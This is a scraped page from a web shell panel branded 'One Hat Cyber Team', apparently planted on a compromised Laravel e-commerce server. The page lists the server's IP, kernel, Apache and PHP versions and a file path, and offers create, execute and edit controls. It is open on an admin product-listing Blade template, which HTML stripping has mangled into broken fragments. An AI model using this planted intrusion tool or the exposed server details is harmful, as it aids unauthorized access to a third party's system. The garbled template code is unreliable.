⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.91
Server IP:
157.245.101.34
Server:
Linux skvinfotech-website 5.4.0-131-generic #147-Ubuntu SMP Fri Oct 14 17:07:22 UTC 2022 x86_64
Server Software:
Apache/2.4.41 (Ubuntu)
PHP Version:
7.4.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
var
/
www
/
wesellnew
/
core
/
resources
/
views
/
back
/
item
/
Edit File: index.blade.php
@extends('master.back') @section('content')
{{ __('All Products') }}
{{__('CSV Export')}}
{{__('Bulk Delete')}}
@include('alerts.alerts')
{{ __('Product Filter :') }}
{{__('All Product')}}
input('item_type') == 'normal' ? 'selected' : ''}}>{{__('Physical Product')}}
input('item_type') == 'digital' ? 'selected' : ''}}>{{__('Digital Product')}}
input('item_type') == 'license' ? 'selected' : ''}}>{{__('Licence Product')}}
input('item_type') == 'affiliate' ? 'selected' : ''}}>{{__('Affiliat Product')}}
{{__('Select Type')}}
{{__('All Type')}}
input('is_type') == 'undefine' ? 'selected' : ''}}>{{__('Undefine Product')}}
input('is_type') == 'new' ? 'selected' : ''}}>{{__('New Arrival')}}
input('is_type') == 'flash_deal' ? 'selected' : ''}}>{{__('Flash Deal Product')}}
input('is_type') == 'feature' ? 'selected' : ''}}> {{__('Featured Product')}}
input('is_type') == 'best' ? 'selected' : ''}}>{{__('Best Product')}}
input('is_type') == 'top' ? 'selected' : ''}}>{{__('Top Product')}}
{{__('Select Category')}}
{{__('All Category')}}
@foreach(DB::table('categories')->whereStatus(1)->get() as $cat)
input('category_id') == $cat->id ? 'selected' : ''}}>{{ $cat->name }}
@endforeach
{{__('Select Order')}}
input('orderby') == 'asc' ? 'selected' : ''}}>{{__('Ascending order')}}
input('orderby') == 'desc' ? 'selected' : ''}}>{{__('Descending order')}}
{{__('Filter Product')}}
{{ __('Image') }}
{{ __('Name') }}
{{ __('Price') }}
{{ __('Status') }}
{{ __('Type') }}
{{ __('Item Type') }}
{{ __('Actions') }}
@include('back.item.table',compact('datas'))
{{-- DELETE MODAL --}}
{{ __('Confirm Delete?') }}
×
{{ __('You are going to delete this item. All contents related with this item will be lost.') }} {{ __('Do you want to delete it?') }}
{{-- DELETE MODAL ENDS --}} @endsection
Simpan